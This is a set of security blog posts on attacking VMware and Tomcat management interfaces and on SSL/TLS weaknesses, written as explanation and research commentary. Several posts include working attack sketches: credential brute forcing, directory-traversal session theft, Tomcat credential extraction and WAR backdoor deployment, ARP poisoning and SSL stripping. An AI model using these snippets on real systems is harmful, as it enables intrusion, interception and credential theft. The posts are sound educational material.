Attacking management interfaces

29 09 2014

The management interfaces, and everything incorporated into that software, are in the author’s opinion the most problematic area in virtualisation security today. There have been numerous attempts over the last few years to demonstrate how management interfaces can be breached. The majority of these attacks are general ones that reuse pre-existing methods such as brute forcing, man-in-the-middle (MiTM) attacks and the numerous flaws in the public key infrastructure (PKI). There are multiple proven attack methods available for exploiting management interfaces, and below are descriptions of some of the attacks that have been discovered by researchers.

In an online blog post, (Mluft, 2011) describes how a brute force attack on the Amazon Web Services (AWS) portal is achievable by leveraging existing hacking tools. In the attack, (Mluft, 2011) demonstrated how a successful logon can be identified using the exemplary payloads in Burp Suite (Burp Suite, 2012), which is used simply to automate the process of attempting logins against the interface. A failed login attempt is identified by the portal returning an HTTP status code of 200 (Network Working Group, 1999), while a correct password returns a status code of 302. Using the documentation provided by Amazon’s services in relation to password policies, (Mluft, 2011) created an appropriate wordlist and used Burp Suite to attempt all the possible permutations. After 400,000 attempts the attack was paused and the results filtered for the 302 status code. The code was found, shown alongside the password value that produced it, giving the attacker the username and password for the administration of all servers managed by that account. It should be noted that all of these attempts originated from one IP address without the account being locked out or subjected to any throttling.
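To make the mechanics concrete, the attack boils down to telling success and failure apart by the status code of the response. The short Python sketch below illustrates this idea only; the portal URL, form field names and wordlist are hypothetical placeholders, and the 200/302 behaviour is the one reported in the attack above rather than anything guaranteed by current AWS portals.

```python
# Minimal sketch of status-code based password guessing, as described above.
# The URL and form field names are hypothetical placeholders, not real AWS endpoints.
import requests

LOGIN_URL = "https://portal.example.com/signin"   # placeholder management portal
USERNAME = "admin@example.com"                    # known account name

def try_password(password: str) -> bool:
    """Return True if the portal responds with a redirect (302), i.e. a likely hit."""
    response = requests.post(
        LOGIN_URL,
        data={"email": USERNAME, "password": password},
        allow_redirects=False,   # keep the raw status code instead of following it
        timeout=10,
    )
    # In the attack described above, 200 meant a failed attempt and 302 a success.
    return response.status_code == 302

with open("wordlist.txt") as wordlist:
    for candidate in (line.strip() for line in wordlist):
        if try_password(candidate):
            print(f"Possible valid credential: {USERNAME} / {candidate}")
            break
```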

As discussed in my earlier blog article regarding the hypervisor, the Virtualization Assessment Toolkit (VASTO) has been developed to exploit multiple weaknesses, predominantly in the VMware family. As well as the identification module that returns the exact version of the server, it includes numerous attacks on virtual systems, including a specific VMware brute forcing module that mimics the attack on the AWS portal by (Mluft, 2011). One of the main contributors to the VASTO project, (Criscione, 2010), demonstrated a number of its different functions at Blackhat USA 2010. Although (Criscione, 2010) showed how VASTO can be used at multiple layers of the virtual stack (client, hypervisor, support, management and internal), the majority of the demonstration concentrated on the management portion. (Criscione, 2010) confirms that although the (VMware, 2012) hardening guide recommends segmentation of management networks, these recommendations are often ignored, leaving management interfaces situated on the same networks as traditional servers.

These servers that manage the entire fabric of the infrastructure have multiple attack vectors – from the operating systems they are installed on to the web services running the interfaces. Vulnerabilities in any one of these platforms can potentially jeopardise the security of an entire environment and should be taken very seriously.

Other VASTO modules that target the management portion of the virtual infrastructure use flaws in the VMware components and their implementation to expose threats in the infrastructure. One exploit included in the VASTO suite that best demonstrates how multiple components in these systems can be chained together originates in a flaw in the Jetty (Eclipse, 2012) web server used by vCenter Update Manager. In the author’s opinion, this attack shows how the complexity and code overhead that these management servers introduce make securing virtual environments efficiently a task that needs to be understood and prioritised. I will briefly give a breakdown of this attack to highlight the multiple elements that were used to complete it.

The Update Manager component of the vSphere suite is designed to secure the environment by automating the patching and updating of hosts that fall under its management scope. However, (Criscione, 2010) recognised that Update Manager requires a version of the Jetty web server to operate, an additional component added to the total footprint of the management server. The version of Jetty installed prior to version 4.1 U1 (update 1) of Update Manager was vulnerable to a directory traversal attack (Wilkins, 2009), which allowed attackers to view any file on the server that the Windows SYSTEM user had privileges to read. Compounding this, vCenter stored a file on the server called “vpxd-profiler-*”, used by administrators for debugging purposes, which contains the SOAP session IDs of all the users that have connected to that server. With one of these IDs, the vmware_session_rider module found in the VASTO toolkit acts as a proxy, allowing the attacker to connect through it to the vCenter server using the selected administrator’s SOAP ID. Once this is completed, the attacker is able to create a new admin credential within vCenter to ensure future access.
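To illustrate the shape of the first two stages of that chain, here is a rough Python sketch. The Update Manager port, the traversal path, the profiler file location and the session-token pattern are all assumptions made purely for illustration; the final session-riding step is what the vmware_session_rider module performs and is not reproduced here.

```python
# Illustrative sketch only: fetch a file through a directory-traversal flaw and
# scrape session identifiers out of it. The port, traversal path, file location
# and token format below are assumptions, not the exact details of the Jetty flaw.
import re
import requests

TARGET = "https://vcenter.example.com:9084"   # hypothetical Update Manager service
TRAVERSAL = "/downloads/../../../../ProgramData/VMware/vpxd-profiler-1"  # placeholder path

response = requests.get(TARGET + TRAVERSAL, verify=False, timeout=10)

# Look for anything resembling a SOAP session identifier in the debug output.
session_ids = set(
    re.findall(r"soapsession[\"=:\s]+([0-9A-Fa-f-]{16,})", response.text, re.I)
)

for sid in session_ids:
    print("Candidate SOAP session ID:", sid)
# Each ID could then be fed to a proxy such as vmware_session_rider to connect
# to vCenter as the corresponding administrator.
```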

Another example of how different elements of the management interface could be used to gain access to vCenter is through VMware’s use of Apache Tomcat (The Apache Software Foundation, 2012). When navigating to a vCenter server through a web browser, one is presented with the standard vSphere “Getting started” screen, as shown in Figure 1.

Figure 1: Web browser connection to the vCenter server

Connecting to that same server’s IP address, but specifying Tomcat’s default index page port of 8443 over an SSL connection, reveals further information, including a link to log in as the “Tomcat manager”. This page is shown in Figure 2.

Figure 2: The web interface seen when navigating to vCenter on port 8443

In VMware version 4.1 there is a user named “VMwareAdmin” that is automatically added to the Tomcat server with full admin rights to the Tomcat service. In earlier versions of VMware, the password for this admin account was five characters long, starting with three uppercase letters, followed by one number and one lowercase letter. This leaves an attacker with a number of options. The most obvious is to brute force the credentials with a compatible tool or script such as the Apache Tomcat brute force tool (Snipt, 2011). A second (and more sophisticated) attack would be to use the directory traversal vulnerability introduced by the Jetty service to gain read access to the server. From there the attacker could navigate to the “tomcat-users.xml” file (C:\Program Files\VMware\Infrastructure\tomcat\conf), shown in Figure 3, an XML file found in VMware 4.1 that contains the clear text credentials of the account; a minimal parsing sketch follows the figure.

Figure 3: (left) The tomcat-users.xml file showing the username and password of a default admin account; (right) the Tomcat manager login prompt
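Once a copy of tomcat-users.xml has been read off the server, extracting the credentials is trivial. A minimal sketch, assuming the file has already been retrieved locally, might look like this:

```python
# Sketch: pull usernames, passwords and roles out of a retrieved tomcat-users.xml.
# Assumes the file has already been obtained, e.g. via the traversal flaw above.
import xml.etree.ElementTree as ET

tree = ET.parse("tomcat-users.xml")
for element in tree.getroot().iter():
    # Tomcat stores accounts as <user username="..." password="..." roles="..."/>
    if element.tag.endswith("user"):
        print(element.get("username"), element.get("password"), element.get("roles"))
```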

Using this access, an attacker is able to control elements of the web service with admin rights. As shown in Figure 4, a number of settings can be changed through the Tomcat interface, including the ability to upload custom WAR files, which can be created using Metasploit to deliver Meterpreter payloads to the server; a sketch of the deployment step follows the figure.

Figure 4: Logged in to the Tomcat manager using the credentials found on the server
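For the final step, the Tomcat manager exposes a simple HTTP deployment interface protected only by basic authentication. The sketch below assumes a WAR payload has already been generated (for example with Metasploit) and uses the older /manager/deploy path; newer Tomcat releases moved this to /manager/text/deploy, so the exact URL depends on the version in use.

```python
# Sketch: deploy a pre-built WAR through the Tomcat manager interface using the
# recovered credentials. The /manager/deploy path applies to older Tomcat
# releases (newer ones use /manager/text/deploy); adjust for the target version.
import requests

MANAGER = "https://vcenter.example.com:8443/manager/deploy?path=/backdoor"
CREDS = ("VMwareAdmin", "password-from-tomcat-users.xml")   # placeholder values

with open("payload.war", "rb") as war:
    response = requests.put(MANAGER, data=war, auth=CREDS, verify=False, timeout=30)

print(response.status_code, response.text)
# A successful deployment makes the payload reachable under /backdoor on the server.
```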

Although some of the attacks using the VASTO toolkit are specific and use vulnerabilities that have almost all been patched by VMware (at the time of writing), the management interfaces are still vulnerable to more general network attacks that cannot be addressed as simply as applying a patch or updating to the newest version. As explained briefly in my post on hypervisors, access to these interfaces is vulnerable to MiTM attacks and to the implementations’ dependence on a highly insecure certificate/PKI model. These vulnerabilities are not directly the responsibility of the vendors, but certainly nothing has been done by them to address the issue.

I will not be explaining the process of how MiTM attacks and flaws in the certificate infrastructure can be used to capture login credentials, as this is a fundamental part of security and has been covered on numerous occasions by multiple sources (Irongeek, 2012) (Schneier, 2011). I have also written about the overarching problems with the certificate model, and how it can be bypassed, in a blog post from 2011.

 

Mluft, 2011. The Key to your Datacenter. [Online] Available at: http://www.insinuator.net/2011/07/the-key-to-your-datacenter/

Criscione, C., 2010. Blackhat 2010 – Virtually Pwned. USA: Youtube.

Wilkins, G., 2009. Vulnerability in ResourceHandler and DefaultServlet with aliases. [Online] Available at: http://jira.codehaus.org/browse/JETTY-1004

Irongeek, 2012. Using Cain to do a “Man in the Middle” attack by ARP poisoning. [Online] Available at: http://www.irongeek.com/i.php?page=videos/using-cain-to-do-a-man-in-the-middle-attack-by-arp-poisoning

Schneier, B., 2011. Schneier on Security. [Online] Available at: http://www.schneier.com/blog/archives/2011/09/man-in-the-midd_4.html





NSA/GCHQ snooping

25 06 2013

Although this may be brief, especially considering the topic, I feel that I should at least throw my two cents into the pot on the current NSA/GCHQ debacle.

I would say that I am somewhat of an advocate for online security and privacy, but I have to say that I was not overwhelmingly shocked as the events unravelled, and I feel that I should explain why. I think that I, and a portion of the industry involved in computer security, had already assumed that traffic has always been captured to some degree, whether by the ISP, the government or other more dangerous parties. Personally, when sending an email to someone I always have in the back of my mind that the communication is unencrypted and therefore shouldn’t contain anything that I wouldn’t be happy shouting from a street corner (so to speak). So when the yells started about the government tapping fibre at key providers, I couldn’t relate to the reaction of others.

The internet is an open network that requires packets to expose certain metadata, such as destination and source, in order to function. Yes, this information can be used to build a ‘mapping’ of you, but so can many other things, like the metadata generated from mobile phone usage, such as physical mast location, which is also provided to the government. People may want to throw on a tinfoil hat and cut all connection with the outside world, but when it is all said and done, unless you are doing something incredibly wrong it is most likely that this information will be discarded. Are 99% of us not already being tracked as we navigate the internet by third-party cookies for advertising purposes, by companies like Google (DoubleClick)?

If you want to stay secure on the internet without taking extreme measures such as Tor or VPN solutions, just ensure that your information is encrypted using good modern encryption techniques, and understand that there are still elements of the internet that are more open than others. Also take basic steps like ensuring that desktops are patched and Java is uninstalled (I mean up to date); these are the areas where more harm will come from the internet than from government snooping.





Conclusion on SSL/TLS

17 08 2011

I decided to focus on the SSL and TLS protocols in this blog series, rather than any of the other secure communication protocols, as I feel that the secure transportation of browser information is only set for exponential growth. With the pressing requirement for online personal accounts and the push towards cloud computing, we can all expect to be entering sensitive information online sooner or later.

As you can see, SSL and TLS are far from impenetrable protocols, even after almost 20 years of improvements and revisions; however, when compared to other technologies that have been around for that amount of time, they have actually proved among the more robust.

Since the protocol was taken over by the Internet Engineering Task Force, fixes for flaws such as the redirection attack mentioned earlier have often been released quickly. The issue with these flaws is the time it takes vendors and administrators to patch their software and sites, leaving users’ data vulnerable.

In many of the examples given around defeating SSL and TLS, it is not the actual protocols themselves that allow this leakage of data. The vulnerabilities that surround these security protocols often have more to do with the worsening certificate ecosystem and user education. This will only worsen unless something is done about companies’ growing lackadaisical approach to validating users. Due to this slip in validation, the traditional SSL certificate has to some extent been superseded by the Extended Validation (EV) certificate, which is not only more expensive but also requires a set of criteria to be followed by the issuer (http://www.cabforum.org/Guidelines_v1_2.pdf) prior to issuing the certificate.

Sites such as Hotmail and Gmail are now becoming slightly savvier to the SSL and TLS bouncing attacks by starting the user off on encrypted pages to avoid SSL stripping. Also, since the release of Firesheep late last year (http://codebutler.github.com/firesheep), a session hijacking tool that preys on users sharing unencrypted Wi-Fi connections, sites such as Facebook and Twitter now give users the option to stay on ‘HTTPS’ for their entire session (Rice, 2011).

There are always new efforts arising to increase the security of the SSL and TLS protocols. However, these will only ever be additional steps added to the existing network model to satisfy the growing need to secure data over a system that was never designed for this kind of traffic. The latest version of TLS, 1.2, has however been designed in such a way that it will most likely be in use for some time to come.





Human Weaknesses in SSL/TLS

11 08 2011

As with any element of computer attacks, often the most effective methods of exploitation come from non-technical attacks that exploit the human element, and unfortunately this is no different when talking about SSL/TLS. Tricking users into entering their personal information into insecure ‘SSL secured’ pages can be done in a number of ways.

Phishing sites are increasingly being used to exploit this weakness. In research carried out by (Symantec, 2009), it was found that, due to the trust users associate with an SSL connection, hackers were targeting sites with already valid SSL certificates and using them to host a number of different phishing sites, as the browser will show the standard secure padlock or, in the case of Extended Validation (EV) SSL certificates, the green bar. As this is intended to indicate security, the user is often unaware that the domain is different from the intended site and will proceed to enter their information. (Symantec, 2009) also details that:

“From May to June 2009 the total number of fraudulent website URLs using VeriSign SSL certificates represented 26% of all SSL certificate attacks, while the previous six months presented only a single occurrence.”

Another method of using phishing to exploit users, which has also been reported on by (Symantec, 2011), is through misspelled domain names. Attackers can register a number of sites that are variations on the spelling of popular domain names, and in this way they can legally acquire valid certificates for those sites. The site is then designed to look the same as the real one; from there the attacker will wait for users to mistype a site name, or proactively send out bulk emails posing as the real site with links back to the fraudulent web page.

Something that might seem obvious to most users, but is often misunderstood when talking about SSL/TLS, is that the protocol itself cannot protect users with weak passwords against brute force or dictionary attacks, as there is nothing in the protocol to specify complexity rules or the number of attempts allowed. This responsibility is left to the individual websites.

Although the human factor is inevitably one of the hardest things to ‘patch’, there are some measures being taken to combat this issue by removing the user’s ability to click through warnings and error messages.

One standard that has recently been adopted by the IETF is HTTP Strict Transport Security (HSTS). Strict Transport Security is now supported in both Chrome and Firefox version 4, with a small number of websites, including Paypal.com, offering support for the standard. HSTS works by the site sending the browser a Strict-Transport-Security response header on the first secure visit, a policy which the browser then stores on the device. From that point forward this site-specific policy ensures that all communication between that domain and the client is encrypted, with no allowance for certificate errors or any unencrypted portions of traffic.
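Concretely, the policy is delivered as a single HTTP response header. The sketch below is a minimal, illustrative server that sets it using Python’s standard library; the max-age value is an arbitrary example, and a real deployment would of course send the header over TLS.

```python
# Minimal sketch: a server advertising an HSTS policy via a response header.
# The max-age value here is illustrative; real deployments choose their own.
from http.server import BaseHTTPRequestHandler, HTTPServer

class HSTSHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        # Instructs the browser to use HTTPS only for this host for the next year.
        self.send_header("Strict-Transport-Security", "max-age=31536000; includeSubDomains")
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"HSTS policy sent\n")

if __name__ == "__main__":
    # In practice this would sit behind TLS; plain HTTP is used here only to keep
    # the sketch self-contained (browsers ignore HSTS received over plain HTTP).
    HTTPServer(("localhost", 8443), HSTSHandler).serve_forever()
```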

In the latest version of the HTTP Strict Transport Security (HSTS) draft (http://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec-01), section 2.2 states the three characteristics of HSTS as being:

• That all insecure connections to an HSTS website should be forced to a secure HTTPS page.

• That any attempted secure connection resulting in an error or warning, “including those caused by a site presenting self-signed certificates”, will be terminated.

• “UAs transform insecure URI references to a HSTS Host into secure URI references before dereferencing them.”





Certificate weaknesses in SSL/TLS

31 07 2011

A major component that guarantees the authenticity of an SSL/TLS connection within the browser is the use of digital certificates. Root certificates are installed and updated independently by each browser vendor. A root certificate is a self-signed certificate whose holder can issue certificates to websites once they have proven their identity and ownership of the domain. As shown in Figure 1, Firefox has a number of root certificates installed by default, including those of the Japanese Government and the Hong Kong Post Office.

This means that we, as users, inherently trust any sites that are signed by these root authorities. The increase in the number of root CAs has resulted in certificates being much easier to obtain than a number of years ago, with often very little validation being performed before they are issued. (Hebbes, 2009) writes:

“the problem is that most Certification Authorities don’t do very much checking. Usually they check your domain name by sending you an email to an address that has the same domain name extension. All this says is that someone who has access to an email address on that domain wants to set up a secure web server. They don’t actually check who you are”

At Defcon 17, (Marlinspike, 2009) gave a talk on defeating SSL security using a tool he had developed called SSLSNIFF (http://www.thoughtcrime.org/software/sslsniff/). This tool takes advantage of multiple vulnerabilities in the certificate validation process and in the SSL/TLS implementations found in all the major browsers used today.

In the presentation, (Marlinspike, 2009) explains that when completing a certificate signing request (CSR), which is defined by the PKCS #10 standard, the subject attribute field, made up of several sub-attributes, requires the requester to enter the name of the site they wish to request the certificate for. As the SSL certificate process can now be completed purely online, and due to the different ways that strings can be formatted in the ‘commonName’ field according to X.509 (RFC 2459), an attacker is able to use a null character to separate the start of the commonName value from the end.

This way, only the end of the commonName attribute (the domain the attacker owns) is checked by the root CA against the WHOIS database records. This means they are able to add anything they want into the commonName attribute before the null value, such as http://www.paypal.com.
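The root of the problem is that the CA and the client read the same commonName differently. The toy Python comparison below is purely illustrative (the domain names are made up) and mimics how a C-style string comparison stops at the first null character while the CA validates the registered suffix:

```python
# Toy illustration of the null-character commonName trick; domain names are made up.
common_name = "www.paypal.com\x00.attacker-owned.example"

# The CA checks ownership of the registered domain at the end of the field:
validated_by_ca = common_name.split("\x00")[-1].lstrip(".")   # "attacker-owned.example"

# A client using C-style string handling stops reading at the first null byte:
seen_by_client = common_name.split("\x00")[0]                 # "www.paypal.com"

print("CA validates ownership of:", validated_by_ca)
print("Client believes it is talking to:", seen_by_client)
```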

Armed with this certificate and SSLSNIFF, an attacker is able to insert themselves into the middle of the communication and act as Paypal.com, with what looks like a completely valid certificate. (Marlinspike, 2009) explains that this attack is possible not only in web browsers such as Firefox, IE and Chrome, but also in mail clients like Thunderbird and Outlook, and even in SSL VPN solutions such as Citrix.

Finally, (Marlinspike, 2009) demonstrated an attack based around the Network Security Services (NSS) libraries implemented in Firefox and Chrome, where an attacker is able to abuse the certificate wildcard handling to gain a universal wildcard certificate using *.domain.com, effectively giving the attacker a valid digital certificate for any website they wish.





Technical Implementation Attacks on SSL/TLS

11 07 2011

As shown in the introduction, since the original release of SSL 1.0 there have been a number of amendments required due to vulnerabilities found in the implementation or the protocol. While the latest version of the TLS protocol (1.2) currently appears to be fairly robust against external attacks, with the introduction of the SHA-256 cipher suites, not all secure communication today takes advantage of this standard. Figure 1, a screenshot of the supported transport protocols within Firefox 3.6.15, shows that the Mozilla developers are yet to adopt the latest two versions of TLS, leaving users open to weakened ciphers and other vulnerabilities that have been addressed in newer versions.

The majority of attacks on SSL and TLS occur from within the same LAN, in the form of man-in-the-middle (MITM) attacks. These work by an attacker placing themselves in between the client and the server, which is done by using the Address Resolution Protocol (ARP) to spoof the whereabouts of MAC addresses on the network. ARP works at layer 2 of the OSI model and is how machines communicate on all Ethernet LANs; this attack is explained in Appendix 1. In a white paper, (Burkholder, 2002) writes:

“In late 2000 security researcher Dug Song published an implementation of an SSL/TLS protocol MITM attack as part of his ‘dsniff’ package.”
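The ARP poisoning that places an attacker in the path is only a handful of lines with a packet-crafting library such as Scapy. The sketch below shows just one half of the poison (the victim’s cache); the addresses are placeholders, and a working MITM would also poison the gateway and forward traffic in both directions.

```python
# Sketch: one half of an ARP cache poisoning attack using Scapy.
# IP and MAC addresses are placeholders; a real MITM also poisons the gateway
# and forwards traffic so the victim's connection keeps working.
import time
from scapy.all import ARP, send

VICTIM_IP, VICTIM_MAC = "192.168.1.50", "aa:bb:cc:dd:ee:ff"
GATEWAY_IP = "192.168.1.1"

poison = ARP(op=2, pdst=VICTIM_IP, hwdst=VICTIM_MAC, psrc=GATEWAY_IP)

while True:
    send(poison, verbose=False)   # tell the victim the gateway lives at our MAC
    time.sleep(2)                 # re-send periodically so the cache stays poisoned
```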

Due to the processing overhead associated with the asymmetric algorithms that SSL/TLS use, sites have often only used these protocols where needed. It is not unusual for websites that do use SSL to protect users’ information to have them fill out their sensitive information on an unencrypted page first, before ‘bouncing’ the data through an SSL/TLS encrypted tunnel. This method of securing data is adequate against attackers who are not proactively sniffing network communications. However, a tool like SSLStrip, as described by its creator (Marlinspike, 2009), lets an attacker add themselves in as a bridge between the two lines of communication. Most users encounter SSL/TLS either through a 302 redirection request directing them from an HTTP page to an HTTPS page, or in the way that shopping sites bounce them to HTTPS pages. The software intercepts the user’s request for the HTTPS page and strips the ‘S’ out of the request, so that all communication with the victim takes place over unencrypted HTTP. The software keeps track of the changes it makes by adding each action it performs to an internal mapping buffer. The attacker is then able to sniff the information being sent in clear text.
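At its core, the stripping step is nothing more than rewriting secure references before the victim sees them while remembering which URLs to upgrade again upstream. The fragment below is not a working proxy and is not SSLStrip itself, just a reduced sketch of that rewrite-and-remember bookkeeping:

```python
# Reduced sketch of the rewrite-and-remember step at the heart of SSL stripping.
# This is not a functioning proxy; it only shows how https:// references can be
# downgraded for the victim while the proxy remembers which URLs to upgrade
# again when forwarding requests to the real server.
import re

stripped_urls = set()   # internal map of URLs the proxy has downgraded

def strip_response(body: str) -> str:
    """Rewrite https:// links to http:// in a response body and record them."""
    def downgrade(match: re.Match) -> str:
        stripped_urls.add(match.group(0))
        return match.group(0).replace("https://", "http://", 1)
    return re.sub(r"https://[^\s\"'<>]+", downgrade, body)

def upgrade_request(url: str) -> str:
    """Restore HTTPS for URLs the proxy previously downgraded."""
    secure = url.replace("http://", "https://", 1)
    return secure if secure in stripped_urls else url

html = '<a href="https://shop.example.com/checkout">Pay now</a>'
downgraded = strip_response(html)
print(downgraded)                                            # victim sees a plain http link
print(upgrade_request("http://shop.example.com/checkout"))   # proxy talks HTTPS upstream
```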

The only way this attack can be spotted by a user is by checking that the address bar is showing HTTPS instead of HTTP and that the SSL padlock is also shown (its location depends on the individual browser), although there are ways to change the address bar icon in transit, for example from the Google logo to a padlock.

Early in November 2009, an article released by (Ray & Dispensa, 2009) disclosed a flaw in the renegotiation portion of the TLS/SSL protocol. This attack affected all versions of TLS and also version 3 of SSL. Although the issue has now been patched in most individual vendors’ SSL/TLS implementations, an article written by (Pettersen, 2010) reports on research suggesting that one year after the public disclosure of the flaw, only 37.3% of all SSL/TLS servers had been patched against the issue.





The History of SSL/TLS

27 06 2011

Netscape Communications created the original specification of Secure Sockets Layer (SSL) in 1994, when it became apparent that there was no way to securely transfer reliable protocols across the internet without fear of interference or snooping of traffic. The first specification, version 1.0, was so heavily criticised by the cryptographic community for its weak cryptographic algorithms that it was never released for public use.

Netscape revised the specification and released a much improved version 2.0 in February 1995. As described by (Shostack, 1995), the second version of the protocol required the use of the MD5 hash function for all cipher types; the MD5 algorithm is defined in (RFC 1321).

While SSL version 2.0 was considered a fairly strong and robust protocol, it did have some areas where it was vulnerable. So in 1996 the next iteration of the protocol, version 3.0, designed by Netscape together with Paul Kocher, was released. As described by (Gibson, 2009), version 3 addressed the weak MD5 hash used in version 2 by producing both an MD5 hash and a SHA-1 hash and XOR’ing the results together to create a hybrid hash that was dependent on both algorithms.

As the protocol was by now gaining such traction on the internet, the Internet Engineering Task Force (IETF) took responsibility for it and renamed it Transport Layer Security (TLS) to avoid bias towards any particular company. Their first release of the protocol, in essence a moderately improved version of SSL version 3 (as shown in Table 1-0), came in January 1999. Although the new TLS 1.0 protocol, detailed in (RFC 2246), was based on SSL version 3.0, it offered no interoperability with the SSL protocol.

Table 1-0 Differences between SSL and TLS (Thomas, 2000)

In April 2006 the IETF released version 1.1 of the standard. According to (RFC 4346), the update:

“contains some small security improvements, clarifications, and editorial improvements”

Finally, the latest and most current version of the TLS standard, 1.2, was released in August 2008 and has a number of improvements, as documented in (RFC 5246), including the removal of older cipher suites like DES and IDEA and the inclusion of the SHA-256 cipher suites.